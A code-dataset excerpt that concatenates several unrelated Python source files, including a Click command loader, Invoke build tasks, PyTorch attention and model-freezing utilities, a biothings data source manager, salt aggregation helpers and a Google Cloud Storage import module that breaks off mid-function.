:param args: Other Arguments passed to super class
:param kwargs: Other Arguments passed to super class
"""
super(BaseCommand, self).__init__(*args, **kwargs)
if not cmd_packages:
cmd_packages = _COMMAND_PACKAGE
self._commands = {}
self._commands = BaseCommand._set_commands(cmd_packages)
@staticmethod
def _set_commands(package_names):
"""
Extract the command name from package name. Last part of the module path is the command
ie. if path is foo.bar.baz, then "baz" is the command name.
:param package_names: List of package names
:return: Dictionary with command name as key and the package name as value.
"""
commands = OrderedDict()
for pkg_name in package_names:
cmd_name = pkg_name.split(".")[-1]
commands[cmd_name] = pkg_name
return commands
def list_commands(self, ctx):
"""
Overrides a method from Click that returns a list of commands available in the CLI.
:param ctx: Click context
:return: List of commands available in the CLI
"""
return list(self._commands.keys())
def get_command(self, ctx, cmd_name):
"""
Overrides method from ``click.MultiCommand`` that returns Click CLI object for given command name, if found.
:param ctx: Click context
:param cmd_name: Top-level command name
:return: Click object representing the command
"""
if cmd_name not in self._commands:
logger.error("Command %s not available", cmd_name)
return None
pkg_name = self._commands[cmd_name]
try:
mod = importlib.import_module(pkg_name)
except ImportError:
logger.exception("Command '%s' is not configured correctly. Unable to import '%s'", cmd_name, pkg_name)
return None
if not hasattr(mod, "cli"):
logger.error("Command %s is not configured correctly. It must expose an function called 'cli'", cmd_name)
return None
return mod.cli |
the-stack_0_6519 | """
Invoke entrypoint, import here all the tasks we want to make available
"""
import os
from invoke import Collection
from . import (
agent,
android,
bench,
cluster_agent,
cluster_agent_cloudfoundry,
customaction,
docker,
dogstatsd,
github,
installcmd,
pipeline,
process_agent,
pylauncher,
release,
rtloader,
security_agent,
selinux,
system_probe,
systray,
trace_agent,
uninstallcmd,
)
from .build_tags import audit_tag_impact
from .go import cyclo, deps, fmt, generate, generate_licenses, golangci_lint, lint, lint_licenses, reset, vet
from .test import (
check_gitlab_broken_dependencies,
e2e_tests,
install_shellcheck,
integration_tests,
lint_filenames,
lint_milestone,
lint_python,
lint_releasenote,
lint_teamassignment,
make_kitchen_gitlab_yml,
make_simple_gitlab_yml,
test,
)
# the root namespace
ns = Collection()
# add single tasks to the root
ns.add_task(fmt)
ns.add_task(lint)
ns.add_task(vet)
ns.add_task(cyclo)
ns.add_task(golangci_lint)
ns.add_task(test)
ns.add_task(integration_tests)
ns.add_task(deps)
ns.add_task(lint_licenses)
ns.add_task(generate_licenses)
ns.add_task(reset)
ns.add_task(lint_teamassignment)
ns.add_task(lint_releasenote)
ns.add_task(lint_milestone)
ns.add_task(lint_filenames)
ns.add_task(lint_python)
ns.add_task(audit_tag_impact)
ns.add_task(e2e_tests)
ns.add_task(make_kitchen_gitlab_yml)
ns.add_task(make_simple_gitlab_yml)
ns.add_task(check_gitlab_broken_dependencies)
ns.add_task(generate)
ns.add_task(install_shellcheck)
# add namespaced tasks to the root
ns.add_collection(agent)
ns.add_collection(android)
ns.add_collection(cluster_agent)
ns.add_collection(cluster_agent_cloudfoundry)
ns.add_collection(customaction)
ns.add_collection(installcmd)
ns.add_collection(bench)
ns.add_collection(trace_agent)
ns.add_collection(docker)
ns.add_collection(dogstatsd)
ns.add_collection(github)
ns.add_collection(pipeline)
ns.add_collection(pylauncher)
ns.add_collection(selinux)
ns.add_collection(systray)
ns.add_collection(release)
ns.add_collection(rtloader)
ns.add_collection(system_probe)
ns.add_collection(process_agent)
ns.add_collection(uninstallcmd)
ns.add_collection(security_agent)
ns.configure(
{
'run': {
# workaround waiting for a fix being merged on Invoke,
# see https://github.com/pyinvoke/invoke/pull/407
'shell': os.environ.get('COMSPEC', os.environ.get('SHELL')),
# this should stay, set the encoding explicitly so invoke doesn't
# freak out if a command outputs unicode chars.
'encoding': 'utf-8',
}
}
)
|
the-stack_0_6520 | import os
token = 'your gitee account token'
report_header = [
'packageName',
'rvPRUser',
'rvPRUrl',
'rvPRStatus',
'created_at',
'updated_at',
'lastest comment time',
'lastest comment submitter'
]
headers = {
'Content-Type': 'application/json;charset=UTF-8'
}
owner = 'openEuler-RISC-V'
excelfile = os.path.join(os.getcwd(), 'pr_info.xlsx') |
the-stack_0_6523 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "Christian Heider Nielsen"
__doc__ = r"""
Created on 02-12-2020
"""
from contextlib import contextmanager
from itertools import tee
from torch.nn import Module
from draugr.torch_utilities.optimisation.parameters.freezing.parameters import (
freeze_parameters,
)
__all__ = ["freeze_model", "frozen_model"]
def freeze_model(model: Module, value: bool = None, recurse: bool = True) -> None:
"""
:param model:
:type model:
:param recurse:
:param value:
:return:"""
freeze_parameters(model.parameters(recurse), value)
@contextmanager
def frozen_model(model: Module, recurse: bool = True, enabled: bool = True) -> None:
"""
:param enabled:
:type enabled:
:param model:
:param recurse:
:return:"""
params_1, params_2 = tee(model.parameters(recurse))
if enabled:
freeze_parameters(params_1, True)
yield True
if enabled:
freeze_parameters(params_2, False)
if __name__ == "__main__":
from torch import nn
def asda():
""" """
a = nn.Linear(10, 5)
print(a.weight.requires_grad)
with frozen_model(a):
print(a.weight.requires_grad)
print(a.weight.requires_grad)
asda()
|
the-stack_0_6524 | import torch
import torch.nn as nn
import torch.nn.functional as F
import math
class Norm(nn.Module):
def __init__(self, d_model, eps = 1e-6):
super().__init__()
self.size = d_model
# create two learnable parameters to calibrate normalisation
self.alpha = nn.Parameter(torch.ones(self.size))
self.bias = nn.Parameter(torch.zeros(self.size))
self.eps = eps
def forward(self, x):
norm = self.alpha * (x - x.mean(dim=-1, keepdim=True)) \
/ (x.std(dim=-1, keepdim=True) + self.eps) + self.bias
return norm
def attention(q, k, v, d_k, mask=None, dropout=None):
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(d_k)
if mask is not None:
#mask = mask.unsqueeze(1)
#scores = scores.masked_fill(mask == 0, -1e9)
pass
scores = F.softmax(scores, dim=-1)
if dropout is not None:
scores = dropout(scores)
output = torch.matmul(scores, v)
return output
class MultiHeadAttention(nn.Module):
def __init__(self, heads, d_model, dropout = 0.1):
super().__init__()
self.d_model = d_model
self.d_k = d_model // heads
self.h = heads
self.q_linear = nn.Linear(d_model, d_model)
self.v_linear = nn.Linear(d_model, d_model)
self.k_linear = nn.Linear(d_model, d_model)
self.dropout = nn.Dropout(dropout)
self.out = nn.Linear(d_model, d_model)
def forward(self, q, k, v, mask=None):
bs = q.size(0)
# perform linear operation and split into N heads
k = self.k_linear(k).view(bs, -1, self.h, self.d_k)
q = self.q_linear(q).view(bs, -1, self.h, self.d_k)
v = self.v_linear(v).view(bs, -1, self.h, self.d_k)
# transpose to get dimensions bs * N * sl * d_model
k = k.transpose(1,2)
q = q.transpose(1,2)
v = v.transpose(1,2)
# calculate attention using function we will define next
scores = attention(q, k, v, self.d_k, mask, self.dropout)
# concatenate heads and put through final linear layer
concat = scores.transpose(1,2).contiguous()\
.view(bs, -1, self.d_model)
output = self.out(concat)
return output
class FeedForward(nn.Module):
def __init__(self, d_model, d_ff=2048, dropout = 0.1):
super().__init__()
# We set d_ff as a default to 2048
self.linear_1 = nn.Linear(d_model, d_ff)
self.dropout = nn.Dropout(dropout)
self.linear_2 = nn.Linear(d_ff, d_model)
def forward(self, x):
x = self.dropout(F.relu(self.linear_1(x)))
x = self.linear_2(x)
return x
|
the-stack_0_6528 | import os
import sys
import types
import logging
from pprint import pformat
import importlib
from biothings.utils.hub_db import get_data_plugin
from biothings.utils.manager import BaseSourceManager
from biothings.utils.hub_db import get_src_master, get_src_dump
class SourceManager(BaseSourceManager):
"""
Helper class to get information about a datasource,
whether it has a dumper and/or uploaders associated.
"""
def __init__(self, source_list, dump_manager, upload_manager,
data_plugin_manager):
self._orig_source_list = source_list
self.source_list = None
self.dump_manager = dump_manager
self.upload_manager = upload_manager
self.data_plugin_manager = data_plugin_manager
self.reload()
self.src_master = get_src_master()
self.src_dump = get_src_dump()
# honoring BaseSourceManager interface (gloups...-
self.register = {}
def reload(self):
# clear registers
self.dump_manager.register.clear()
self.upload_manager.register.clear()
# re-eval source list (so if it's a string, it'll re-discover sources)
self.source_list = self.find_sources(self._orig_source_list)
self.dump_manager.register_sources(self.source_list)
self.upload_manager.register_sources(self.source_list)
def find_sources(self, paths):
sources = []
if not type(paths) == list:
paths = [paths]
def eval_one_source(one_path):
if "/" in one_path:
# it's path to directory
# expecting
if one_path not in sys.path:
logging.info("Adding '%s' to python path" % one_path)
sys.path.insert(0, one_path)
for d in os.listdir(one_path):
if d.endswith("__pycache__"):
continue
sources.append(d)
else:
# assuming it's path to a python module (oath.to.module)
sources.append(one_path)
def eval_one_root(root):
logging.debug("Discovering sources in %s" % root)
# root is a module path where sources can be found
rootdir, __init__ = os.path.split(root.__file__)
for srcdir in os.listdir(rootdir):
if srcdir.endswith("__pycache__"):
continue
srcpath = os.path.join(rootdir, srcdir)
if os.path.isdir(srcpath):
srcmod_str = "%s.%s" % (root.__name__, srcdir)
sources.append(srcmod_str)
for path in paths:
if type(path) == str:
eval_one_source(path)
elif isinstance(path, types.ModuleType):
eval_one_root(path)
# clean with only those which can be imported
sources = set(sources)
for s in [s for s in sources]:
try:
importlib.import_module(s)
except Exception as e:
logging.error("Failed to discover source '%s': %s" % (s, e))
sources.remove(s)
logging.info("Found sources: %s" % sorted(sources))
return sources
def set_mapping_src_meta(self, subsrc, mini):
# get mapping from uploader klass first (hard-coded), then src_master (generated/manual)
src_meta = {}
mapping = {}
origin = None
try:
upk = self.upload_manager["%s.%s" % (mini["_id"], subsrc)]
assert len(
upk) == 1, "More than 1 uploader found, can't handle that..."
upk = upk.pop()
src_meta = upk.__metadata__["src_meta"]
mapping = upk.get_mapping()
origin = "uploader"
if not mapping:
raise AttributeError("Not hard-coded mapping")
except (IndexError, KeyError, AttributeError) as e:
logging.debug(
"Can't find hard-coded mapping, now searching src_master: %s" %
e)
m = self.src_master.find_one({"_id": subsrc})
mapping = m and m.get("mapping")
origin = "master"
# use metadata from upload or reconstitute(-ish)
src_meta = src_meta or m and dict([(k, v) for (k, v) in m.items() if k not in ["_id", "name", "timestamp", "mapping"]])
if mapping:
mini.setdefault("mapping",
{}).setdefault(subsrc,
{}).setdefault("mapping", mapping)
mini.setdefault("mapping",
{}).setdefault(subsrc,
{}).setdefault("origin", origin)
if src_meta:
mini.setdefault("__metadata__", {}).setdefault(subsrc, src_meta)
def sumup_source(self, src, detailed=False):
"""Return minimal info about src"""
mini = {}
mini["_id"] = src.get("_id", src["name"])
mini["name"] = src["name"]
if src.get("download"):
mini["download"] = {
"status": src["download"].get("status"),
"time": src["download"].get("time"),
"started_at": src["download"].get("started_at"),
"release": src["download"].get("release"),
"data_folder": src["download"].get("data_folder"),
}
mini["download"]["dumper"] = src["download"].get("dumper", {})
if src["download"].get("err"):
mini["download"]["error"] = src["download"]["err"]
if src["download"].get("tb"):
mini["download"]["traceback"] = src["download"]["tb"]
count = 0
if src.get("upload"):
mini["upload"] = {"sources": {}}
for job, info in src["upload"]["jobs"].items():
mini["upload"]["sources"][job] = {
"time": info.get("time"),
"status": info.get("status"),
"count": info.get("count"),
"started_at": info.get("started_at"),
"release": info.get("release"),
"data_folder": info.get("data_folder"),
}
if info.get("err"):
mini["upload"]["sources"][job]["error"] = info["err"]
if info.get("tb"):
mini["upload"]["sources"][job]["traceback"] = info["tb"]
count += info.get("count") or 0
if detailed:
self.set_mapping_src_meta(job, mini)
if src.get("inspect"):
mini["inspect"] = {"sources": {}}
for job, info in src["inspect"]["jobs"].items():
if not detailed:
# remove big inspect data but preserve inspect status/info and errors
mode_has_error = []
mode_ok = []
for mode in info.get("inspect", {}).get("results", {}):
if info["inspect"]["results"][mode].get("errors"):
mode_has_error.append(mode)
else:
mode_ok.append(mode)
for mode in mode_ok:
info["inspect"]["results"].pop(mode)
for mode in mode_has_error:
keys = list(info["inspect"]["results"][mode].keys())
# remove all except errors
for k in keys:
if k != "errors":
info["inspect"]["results"][mode].pop(k)
mini["inspect"]["sources"][job] = info
if src.get("locked"):
mini["locked"] = src["locked"]
mini["count"] = count
return mini
def get_sources(self, id=None, debug=False, detailed=False):
dm = self.dump_manager
um = self.upload_manager
dpm = self.data_plugin_manager
ids = set()
if id and id in dm.register:
ids.add(id)
elif id and id in um.register:
ids.add(id)
elif id and id in dpm.register:
ids.add(id)
else:
# either no id passed, or doesn't exist
if id and not len(ids):
raise ValueError("Source %s doesn't exist" % repr(id))
ids = set(dm.register)
ids.update(um.register)
ids.update(dpm.register)
sources = {}
bydsrcs = {}
byusrcs = {}
bydpsrcs = {}
plugins = get_data_plugin().find()
[bydsrcs.setdefault(src["_id"], src) for src in dm.source_info() if dm]
[byusrcs.setdefault(src["_id"], src) for src in um.source_info() if um]
[bydpsrcs.setdefault(src["_id"], src) for src in plugins]
for _id in ids:
# start with dumper info
if dm:
src = bydsrcs.get(_id)
if src:
if debug:
sources[src["name"]] = src
else:
sources[src["name"]] = self.sumup_source(src, detailed)
# complete with uploader info
if um:
src = byusrcs.get(_id)
if src:
# collection-only source don't have dumpers and only exist in
# the uploader manager
if not src["_id"] in sources:
sources[src["_id"]] = self.sumup_source(src, detailed)
if src.get("upload"):
for subname in src["upload"].get("jobs", {}):
try:
sources[src["name"]].setdefault(
"upload",
{"sources": {}})["sources"].setdefault(
subname, {})
sources[src["name"]]["upload"]["sources"][
subname]["uploader"] = src["upload"][
"jobs"][subname].get("uploader")
except Exception as e:
logging.error("Source is invalid: %s\n%s" %
(e, pformat(src)))
# deal with plugin info if any
if dpm:
src = bydpsrcs.get(_id)
if src:
assert len(
dpm[_id]
) == 1, "Expected only one uploader, got: %s" % dpm[_id]
klass = dpm[_id][0]
src.pop("_id")
if hasattr(klass, "data_plugin_error"):
src["error"] = klass.data_plugin_error
sources.setdefault(_id, {"data_plugin": {}})
if src.get("download", {}).get("err"):
src["download"]["error"] = src["download"].pop("err")
if src.get("download", {}).get("tb"):
src["download"]["traceback"] = src["download"].pop("tb")
sources[_id]["data_plugin"] = src
sources[_id]["_id"] = _id
sources[_id]["name"] = _id
if id:
src = list(sources.values()).pop()
# enrich with metadata (uploader > dumper)
ks = []
if dm:
try:
ks.extend(dm.register[id])
except KeyError:
pass
if um:
try:
ks.extend(um.register[id])
except KeyError:
pass
for upk in ks:
# name either from uploader or dumper
name = getattr(upk, "name", None) or upk.SRC_NAME
if getattr(upk, "__metadata__", {}).get("src_meta"):
src.setdefault("__metadata__", {}).setdefault(name, {})
src["__metadata__"][name] = upk.__metadata__["src_meta"]
# simplify as needed (if only one source in metadata, remove source key level,
# or if licenses are the same amongst sources, keep one copy)
if len(src.get("__metadata__", {})) == 1:
src["__metadata__"] = list(src["__metadata__"].values()).pop()
elif len(src.get("__metadata__", {})) > 1:
metas = list(src["__metadata__"].values())
simplified = [metas.pop()]
same = True
while metas:
m = metas.pop()
if m not in simplified:
same = False
break
if same:
# we consume all of them, ie. they're all equals
src["__metadata__"] = list(
src["__metadata__"].values()).pop()
else:
# convert to a list of dict (so it's easier to detect if one or more
# licenses just by checking if type is dict (one) or array (more))
metas = src.pop("__metadata__")
src["__metadata__"] = []
for m in metas:
src["__metadata__"].append({m: metas[m]})
return src
else:
return list(sources.values())
def get_source(self, name, debug=False):
return self.get_sources(id=name, debug=debug, detailed=True)
def save_mapping(self, name, mapping=None, dest="master", mode="mapping"):
logging.debug("Saving mapping for source '%s' destination='%s':\n%s" %
(name, dest, pformat(mapping)))
# either given a fully qualified source or just sub-source
try:
subsrc = name.split(".")[1]
except IndexError:
subsrc = name
if dest == "master":
m = self.src_master.find_one({"_id": subsrc}) or {"_id": subsrc}
m["mapping"] = mapping
self.src_master.save(m)
elif dest == "inspect":
m = self.src_dump.find_one({"_id": name})
try:
m["inspect"]["jobs"][subsrc]["inspect"]["results"][
mode] = mapping
self.src_dump.save(m)
except KeyError as e:
raise ValueError(
"Can't save mapping, document doesn't contain expected inspection data"
% e)
else:
raise ValueError("Unknow saving destination: %s" % repr(dest))
def reset(self, name, key="upload", subkey=None):
"""
Reset, ie. delete, internal data (src_dump document) for given source name, key subkey.
This method is useful to clean outdated information in Hub's internal database.
Ex: key=upload, name=mysource, subkey=mysubsource, will delete entry in corresponding
src_dump doc (_id=mysource), under key "upload", for sub-source named "mysubsource"
"key" can be either 'download', 'upload' or 'inspect'. Because there's no such notion of subkey for
dumpers (ie. 'download', subkey is optional.
"""
doc = self.src_dump.find_one({"_id": name})
if not doc:
raise ValueError("No such datasource named '%s'" % name)
try:
# nested
if key in ["upload", "inspect"]:
del doc[key]["jobs"][subkey]
# not nested
elif key == "download":
del doc[key]
else:
raise ValueError("key=%s not allowed" % repr(key))
self.src_dump.save(doc)
except KeyError as e:
logging.exception(e)
raise ValueError(
"Can't delete information, not found in document: %s" % e)
|
the-stack_0_6530 | from collections import defaultdict
from copy import deepcopy
import matplotlib.font_manager as fm
import numpy as np
from ...config import SETTINGS
from .plot_tree_graph import plot_tree_graph
class AssemblyGraphMixin:
def plot_assembly_graph(self, ax=None, margin=None, textprops=None, scale=1.0):
"""Plot the complete assembly graph.
Returns
-------
elements_positions, ax
Dictionary of element positions, matplotlib ax.
"""
nodes_dict = {}
levels = defaultdict(lambda *a: [])
edges = []
tree = deepcopy(self.plan)
def rec(node, depth=0):
if node.get("_visited", False):
return
nodes_dict[node.id] = node
node["_visited"] = True
assembly_plan = node.pop("assembly_plan")
levels[depth].append(node.id)
for other in assembly_plan:
edges.append([other.id, node.id])
rec(other, depth + 1)
rec(tree)
levels = [levels[i] for i in range(max(levels) + 1)][::-1]
fontawesome = fm.FontProperties(
fname=SETTINGS["fontawesome-ttf-path"],
size=13 * scale,
family="sans-serif",
)
if textprops is None:
textprops = fm.FontProperties(
fname=SETTINGS["OpenSans-ttf-path"],
size=12 * scale,
family="sans-serif",
)
def draw_node(x, y, node_id, ax):
node = nodes_dict[node_id]
icon = self.sources[node.source]._report_fa_symbol
ax.text(
x,
y,
node_id,
horizontalalignment="left",
verticalalignment="center",
fontproperties=textprops,
)
ax.text(
x - 0.01 * np.sqrt(scale),
y,
icon,
horizontalalignment="right",
verticalalignment="center",
fontproperties=fontawesome,
)
all_elements = sorted(sum(levels, []))
ypos = {
el: 1.0 * (i + 1) / (len(all_elements) + 2)
for i, el in enumerate(all_elements)
}
for el in all_elements:
children = [e2 for (e2, e1) in edges if e1 == el]
if children != []:
ypos[el] = 1.0 * sum(ypos[e] for e in children) / len(children)
xpos = {
el: 1.0 * (1 + x) / (len(levels) + 1)
for x, elements in enumerate(levels)
for el in elements
}
elements_positions = {el: (xpos[el], ypos[el]) for el in all_elements}
return plot_tree_graph(
levels,
edges,
draw_node,
elements_positions=elements_positions,
ax=ax,
edge_left_space=0.06,
edge_right_space=0.03,
margin=margin,
height_factor=0.40,
width_factor=5.5,
scale=scale,
)
|
the-stack_0_6534 | # demo for binary search
import math
def binarysearch(search, sortedlist):
left = 0
right = len(sortedlist) -1
mid = math.ceil((right + left) / 2)
while sortedlist[mid] != search:
if search > sortedlist[mid]:
left = mid+1
else:
right = mid-1
if left > right or right < left:
return -1
mid = math.ceil((right + left)/2)
return mid
arr = [1,3,4,5,44,55,66,78,109,1000]
print(arr)
print(binarysearch( int(input("Enter num: ")),arr))
|
the-stack_0_6535 | # -*- coding: utf-8 -*-
'''
salt.utils.aggregation
~~~~~~~~~~~~~~~~~~~~~~
This library allows to introspect dataset and aggregate nodes when it is
instructed.
.. note::
The following examples with be expressed in YAML for convenience sake:
- !aggr-scalar will refer to Scalar python function
- !aggr-map will refer to Map python object
- !aggr-seq will refer for Sequence python object
How to instructs merging
------------------------
This yaml document have duplicate keys:
.. code-block:: yaml
foo: !aggr-scalar first
foo: !aggr-scalar second
bar: !aggr-map {first: foo}
bar: !aggr-map {second: bar}
baz: !aggr-scalar 42
but tagged values instruct salt that overlaping values they can be merged
together:
.. code-block:: yaml
foo: !aggr-seq [first, second]
bar: !aggr-map {first: foo, second: bar}
baz: !aggr-seq [42]
Default merge strategy is keeped untouched
------------------------------------------
For example, this yaml document have still duplicate keys, but does not
instruct aggregation:
.. code-block:: yaml
foo: first
foo: second
bar: {first: foo}
bar: {second: bar}
baz: 42
So the late found values prevail:
.. code-block:: yaml
foo: second
bar: {second: bar}
baz: 42
Limitations
-----------
Aggregation is permitted between tagged objects that share the same type.
If not, the default merge strategy prevails.
For example, these examples:
.. code-block:: yaml
foo: {first: value}
foo: !aggr-map {second: value}
bar: !aggr-map {first: value}
bar: 42
baz: !aggr-seq [42]
baz: [fail]
qux: 42
qux: !aggr-scalar fail
are interpreted like this:
.. code-block:: yaml
foo: !aggr-map{second: value}
bar: 42
baz: [fail]
qux: !aggr-seq [fail]
Introspection
-------------
.. todo:: write this part
'''
from __future__ import absolute_import
from copy import copy
import logging
from salt.utils.odict import OrderedDict
__all__ = ['aggregate', 'Aggregate', 'Map', 'Scalar', 'Sequence']
log = logging.getLogger(__name__)
class Aggregate(object):
"""
Aggregation base.
"""
pass
class Map(OrderedDict, Aggregate):
"""
Map aggregation.
"""
pass
class Sequence(list, Aggregate):
"""
Sequence aggregation.
"""
pass
def Scalar(obj):
'''
Shortcut for Sequence creation
>>> Scalar('foo') == Sequence(['foo'])
True
'''
return Sequence([obj])
def levelise(level):
'''
Describe which levels are allowed to do deep merging.
level can be:
True
all levels are True
False
all levels are False
an int
only the first levels are True, the others are False
a sequence
it describes which levels are True, it can be:
* a list of bool and int values
* a string of 0 and 1 characters
'''
if not level: # False, 0, [] ...
return False, False
if level is True:
return True, True
if isinstance(level, int):
return True, level - 1
try: # a sequence
deep, subs = int(level[0]), level[1:]
return bool(deep), subs
except Exception as error:
log.warning(error)
raise
def mark(obj, map_class=Map, sequence_class=Sequence):
'''
Convert obj into an Aggregate instance
'''
if isinstance(obj, Aggregate):
return obj
if isinstance(obj, dict):
return map_class(obj)
if isinstance(obj, (list, tuple, set)):
return sequence_class(obj)
else:
return sequence_class([obj])
def aggregate(obj_a, obj_b, level=False, map_class=Map, sequence_class=Sequence): # NOQA
'''
Merge obj_b into obj_a.
>>> aggregate('first', 'second', True) == ['first', 'second']
True
'''
deep, subdeep = levelise(level)
if deep:
obj_a = mark(obj_a, map_class=Map, sequence_class=Sequence)
obj_b = mark(obj_b, map_class=Map, sequence_class=Sequence)
if isinstance(obj_a, dict) and isinstance(obj_b, dict):
if isinstance(obj_a, Aggregate) and isinstance(obj_b, Aggregate):
# deep merging is more or less a.update(obj_b)
response = copy(obj_a)
else:
# introspection on obj_b keys only
response = copy(obj_b)
for key, value in obj_b.items():
if key in obj_a:
value = aggregate(obj_a[key], value,
subdeep, map_class, sequence_class)
response[key] = value
return response
if isinstance(obj_a, Sequence) and isinstance(obj_a, Sequence):
response = obj_a.__class__(obj_a[:])
for value in obj_b:
if value not in obj_a:
response.append(value)
return response
if isinstance(obj_a, Aggregate) or isinstance(obj_a, Aggregate):
log.info('only one value marked as aggregate. keep `obj_a` value')
return obj_b
log.debug('no value marked as aggregate. keep `obj_a` value')
return obj_b
|
the-stack_0_6539 | import argparse
import os
import time
import typing as t
from random import randint, choice
import pandas as pd
import requests
from gradient_boosting_model.config.core import config
from gradient_boosting_model.processing.data_management import load_dataset
LOCAL_URL = f'http://{os.getenv("DB_HOST", "localhost")}:5000'
HEADERS = {"Accept": "application/json", "Content-Type": "application/json"}
LOT_AREA_MAP = {"min": 1470, "max": 56600}
FIRST_FLR_SF_MAP = {"min": 407, "max": 5095}
SECOND_FLR_SF_MAP = {"min": 0, "max": 1862}
BSMT_QUAL_VALUES = ('Gd', 'TA', 'Ex', 'Fa')
def _generate_random_int(value: int, value_ranges: t.Mapping) -> int:
"""Generate random integer within a min and max range."""
random_value = randint(value_ranges["min"], value_ranges["max"])
return int(random_value)
def _select_random_category(value: str, value_options: t.Sequence) -> str:
"""Select random category given a sequence of categories."""
random_category = choice(value_options)
return random_category
def _prepare_inputs(dataframe: pd.DataFrame) -> pd.DataFrame:
"""Prepare input data by removing key rows with NA values."""
clean_inputs_df = dataframe.dropna(
subset=config.model_config.features + ["KitchenQual", "LotFrontage"]
).copy()
clean_inputs_df.loc[:, "FirstFlrSF"] = clean_inputs_df["FirstFlrSF"].apply(
_generate_random_int, value_ranges=FIRST_FLR_SF_MAP
)
clean_inputs_df.loc[:, "SecondFlrSF"] = clean_inputs_df["SecondFlrSF"].apply(
_generate_random_int, value_ranges=SECOND_FLR_SF_MAP
)
clean_inputs_df.loc[:, "LotArea"] = clean_inputs_df["LotArea"].apply(
_generate_random_int, value_ranges=LOT_AREA_MAP
)
clean_inputs_df.loc[:, "BsmtQual"] = clean_inputs_df["BsmtQual"].apply(
_select_random_category, value_options=BSMT_QUAL_VALUES
)
return clean_inputs_df
def populate_database(n_predictions: int = 500, anomaly: bool = False) -> None:
"""
Manipulate the test data to generate random
predictions and save them to the database.
Before running this script, ensure that the
API and Database docker containers are running.
"""
print(f"Preparing to generate: {n_predictions} predictions.")
# Load the gradient boosting test dataset which
# is included in the model package
test_inputs_df = load_dataset(file_name="test.csv")
clean_inputs_df = _prepare_inputs(dataframe=test_inputs_df)
if len(clean_inputs_df) < n_predictions:
print(
f"If you want {n_predictions} predictions, you need to"
"extend the script to handle more predictions."
)
if anomaly:
# set extremely low values to generate an outlier
n_predictions = 1
clean_inputs_df.loc[:, "FirstFlrSF"] = 1
clean_inputs_df.loc[:, "LotArea"] = 1
clean_inputs_df.loc[:, "OverallQual"] = 1
clean_inputs_df.loc[:, "GrLivArea"] = 1
clean_inputs_df = clean_inputs_df.where(pd.notnull(clean_inputs_df), None)
for index, data in clean_inputs_df.iterrows():
if index > n_predictions:
if anomaly:
print('Created 1 anomaly')
break
response = requests.post(
f"{LOCAL_URL}/v1/predictions/regression",
headers=HEADERS,
json=[data.to_dict()],
)
response.raise_for_status()
if index % 50 == 0:
print(f"{index} predictions complete")
# prevent overloading the server
time.sleep(0.5)
print("Prediction generation complete.")
if __name__ == "__main__":
anomaly = False
parser = argparse.ArgumentParser(
description='Send random requests to House Price API.')
parser.add_argument('--anomaly', help="generate unusual inputs")
args = parser.parse_args()
if args.anomaly:
print("Generating unusual inputs")
anomaly = True
populate_database(n_predictions=500, anomaly=anomaly)
|
the-stack_0_6540 | """This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import logging
import json
import socket
import re
import google.auth
import re
from google.auth import compute_engine
from google.cloud import storage as google_storage
from google.auth.transport import requests
from urllib.parse import urlparse
from datetime import datetime, timedelta
from django.db import models, transaction
from django.utils.translation import gettext_lazy as _
from django.conf import settings
from django.dispatch import receiver
from django.db.models.signals import post_save
from io_storages.utils import get_uri_via_regex
from io_storages.base_models import ImportStorage, ImportStorageLink, ExportStorage, ExportStorageLink
from io_storages.serializers import StorageAnnotationSerializer
from tasks.models import Annotation
logger = logging.getLogger(__name__)
url_scheme = 'gs'
class GCSStorageMixin(models.Model):
bucket = models.TextField(
_('bucket'), null=True, blank=True,
help_text='GCS bucket name')
prefix = models.TextField(
_('prefix'), null=True, blank=True,
help_text='GCS bucket prefix')
regex_filter = models.TextField(
_('regex_filter'), null=True, blank=True,
help_text='Cloud storage regex for filtering objects')
use_blob_urls = models.BooleanField(
_('use_blob_urls'), default=False,
help_text='Interpret objects as BLOBs and generate URLs')
def get_client(self):
return google_storage.Client()
def get_bucket(self, client=None, bucket_name=None):
if not client:
client = self.get_client()
return client.get_bucket(bucket_name or self.bucket)
class GCSImportStorage(ImportStorage, GCSStorageMixin):
presign = models.BooleanField(
_('presign'), default=True,
help_text='Generate presigned URLs')
presign_ttl = models.PositiveSmallIntegerField(
_('presign_ttl'), default=1,
help_text='Presigned URLs TTL (in minutes)'
)
def iterkeys(self):
bucket = self.get_bucket()
files = bucket.list_blobs(prefix=self.prefix)
prefix = str(self.prefix) if self.prefix else ''
regex = re.compile(str(self.regex_filter)) if self.regex_filter else None
for file in files:
if file.name == (prefix.rstrip('/') + '/'):
continue
# check regex pattern filter
if regex and not regex.match(file.name):
logger.debug(file.name + ' is skipped by regex filter')
continue
yield file.name
def get_data(self, key):
if self.use_blob_urls:
return {settings.DATA_UNDEFINED_NAME: f'{url_scheme}://{self.bucket}/{key}'}
bucket = self.get_bucket()
blob = bucket.blob(key)
blob_str = blob.download_as_string()
value = json.loads(blob_str)
if not isinstance(value, dict):
raise ValueError(f"Error on key {key}: For {self.__class__.__name__} your JSON file must be a dictionary with one task.") # noqa
return value
@classmethod
def is_gce_instance(cls):
"""Check if it's GCE instance via DNS lookup to metadata server"""
try:
socket.getaddrinfo('metadata.google.internal', 80)
except socket.gaierror:
return False
return True
def resolve_gs(self, url, **kwargs):
r = urlparse(url, allow_fragments=False)
bucket_name = r.netloc
key = r.path.lstrip('/')
if self.is_gce_instance():
logger.debug('Generate signed URL for GCE instance')
return self.python_cloud_function_get_signed_url(bucket_name, key)
else:
logger.debug('Generate signed URL for local instance')
return self.generate_download_signed_url_v4(bucket_name, key)
def generate_download_signed_url_v4(self, bucket_name, blob_name):
"""Generates a v4 signed URL for downloading a blob.
Note that this method requires a service account key file. You can not use
this if you are using Application Default Credentials from Google Compute
Engine or from the Google Cloud SDK.
"""
# bucket_name = 'your-bucket-name'
# blob_name = 'your-object-name'
client = self.get_client()
bucket = self.get_bucket(client, bucket_name)
blob = bucket.blob(blob_name)
url = blob.generate_signed_url(
version="v4",
# This URL is valid for 15 minutes
expiration=timedelta(minutes=self.presign_ttl),
# Allow GET requests using this URL.
method="GET",
)
logger.debug('Generated GCS signed url: ' + url)
return url
def python_cloud_function_get_signed_url(self, bucket_name, blob_name):
# https://gist.github.com/jezhumble/91051485db4462add82045ef9ac2a0ec
# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
# This snippet shows you how to use Blob.generate_signed_url() from within compute engine / cloud functions
